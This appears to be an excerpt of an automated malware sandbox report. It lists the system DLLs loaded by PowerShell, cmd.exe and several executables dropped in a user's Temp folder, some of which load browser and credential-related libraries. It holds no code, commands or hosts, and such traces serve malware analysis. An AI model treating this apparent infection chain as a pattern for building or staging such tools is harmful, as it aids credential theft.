Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: oledlg.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: pla.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: tdh.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: uxtheme.dll
